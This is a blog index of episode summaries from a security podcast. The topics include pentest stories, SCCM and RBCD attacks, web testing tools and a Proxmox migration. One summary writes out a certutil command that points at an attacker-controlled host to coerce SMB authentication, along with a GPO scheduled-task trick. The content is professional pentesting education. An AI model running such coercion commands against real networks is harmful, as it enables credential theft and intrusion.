Blog
Search all our posts or browse some of our most recent entries below:
7MS #632: Tales of Pentest Pwnage – Part 59
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If [...]
7MS #631: Tales of Pentest Pwnage – Part 58
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares [...]
7MS #630: Epic Road Trip Served with Security Sprinkles
Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don't care about their personal security Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring, [...]
7MS #629: Interview with Stu Musil of Ambient Consulting
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don't know, but who offers a job opportunity you're interested in? What questions should you ask [...]
7MS #628: How to Succeed in Business Without Really Crying – Part 17
Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses - to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don't almost get cancelled like some did with me!) Tracking domain [...]
7MS #627: Migrating from vCenter to Proxmox – Part 2
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how [...]
7MS #626: Web Pentesting Pastiche
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 20% discount! Hey friends, today we've got a security milkshake episode about Web app pentesting. Specifically we talk about: Burp Suite Enterprise Caido - a lightweight alternative to Burp wfuzz - Web fuzzer. [...]
7MS #625: A Peek into the 7MS Mail Bag – Part 4
Road trip time! I've been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today's questions include: How do you price internal network penetration tests? Have you ever had to deal with a difficult client situation, and how did you resolve it? Are you done going [...]
7MS #624: Tales of Pentest Pwnage – Part 57
Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn't want today's episode to just be "Hey friends, check out the YouTube version of this attack!" so [...]
7MS #623: Prelude to a Tale of Pentest Pwnage
Today's prelude to a tale of pentest pwnage talks about something called "spnless RBCD" (resource-based constrained delegation). Here are the key steps: Lets use my lab of tangent.town as an example and say that TT-DC02 is where Webdav is enabled. Add a DNS record that points to your testing box (I think this is required so the victim systems consider you to be in the [...]
7MS #622: Migrating from vCenter to Proxmox – Part 1
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard - we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH's fault). Now we're exploring Proxmox as an alternative hypervisor, so we're using today's episode to kick off a [...]